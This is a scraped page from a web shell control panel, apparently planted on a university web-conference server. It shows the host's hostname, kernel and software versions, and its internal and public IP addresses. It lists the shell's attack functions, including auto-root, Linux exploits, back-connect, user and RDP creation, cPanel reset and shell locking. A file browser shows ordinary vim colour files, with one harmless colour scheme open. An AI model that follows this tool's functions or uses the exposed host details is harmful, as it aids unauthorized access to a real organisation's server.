Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.191.198.245
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
vim /
vim81 /
colors /
[ HOME SHELL ]
Name
Size
Permission
Action
tools
[ DIR ]
drwxr-xr-x
README.txt
3.2
KB
-rw-r--r--
blue.vim
2.42
KB
-rw-r--r--
darkblue.vim
2.92
KB
-rw-r--r--
default.vim
548
B
-rw-r--r--
delek.vim
2.46
KB
-rw-r--r--
desert.vim
2.75
KB
-rw-r--r--
elflord.vim
1.63
KB
-rw-r--r--
evening.vim
2.39
KB
-rw-r--r--
industry.vim
1.91
KB
-rw-r--r--
koehler.vim
3.47
KB
-rw-r--r--
morning.vim
2.4
KB
-rw-r--r--
murphy.vim
1.96
KB
-rw-r--r--
pablo.vim
1.01
KB
-rw-r--r--
peachpuff.vim
2.61
KB
-rw-r--r--
ron.vim
1.36
KB
-rw-r--r--
shine.vim
2.66
KB
-rw-r--r--
slate.vim
2.39
KB
-rw-r--r--
torte.vim
1.59
KB
-rw-r--r--
zellner.vim
1.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : industry.vim
" Vim color file " Maintainer: Shian Lee " Last Change: 2014 Mar 6 (for vim 7.4) " Remark: "industry" stands for 'industrial' color scheme. In industrial " HMI (Human-Machine-Interface) programming, using a standard color " scheme is mandatory in many cases (in traffic-lights for example): " LIGHT_RED is 'Warning' " LIGHT_YELLOW is 'Attention' " LIGHT_GREEN is 'Normal' " LIGHT_MAGENTA is 'Warning-Attention' (light RED-YELLOW) " LIGHT_CYAN is 'Attention-Normal' (light YELLOW-GREEN). " BLACK is Dark-High-Contrast Background for maximum safety. " BLUE is Shade of BLACK (not supposed to get attention). " " Industrial color scheme is by nature clear, safe and productive. " Yet, depends on the file type's syntax, it might appear incorrect. " Reset to dark background, then reset everything to defaults: set background=dark highlight clear if exists("syntax_on") syntax reset endif let colors_name = "industry" " First set Normal to regular white on black text colors: hi Normal ctermfg=LightGray ctermbg=Black guifg=#dddddd guibg=Black " Syntax highlighting (other color-groups using default, see :help group-name): hi Comment cterm=NONE ctermfg=DarkCyan gui=NONE guifg=#00aaaa hi Constant cterm=NONE ctermfg=LightCyan gui=NONE guifg=#00ffff hi Identifier cterm=NONE ctermfg=LightMagenta gui=NONE guifg=#ff00ff hi Function cterm=NONE ctermfg=LightGreen gui=NONE guifg=#00ff00 hi Statement cterm=NONE ctermfg=White gui=bold guifg=#ffffff hi PreProc cterm=NONE ctermfg=Yellow gui=NONE guifg=#ffff00 hi Type cterm=NONE ctermfg=LightGreen gui=bold guifg=#00ff00 hi Special cterm=NONE ctermfg=LightRed gui=NONE guifg=#ff0000 hi Delimiter cterm=NONE ctermfg=Yellow gui=NONE guifg=#ffff00
Close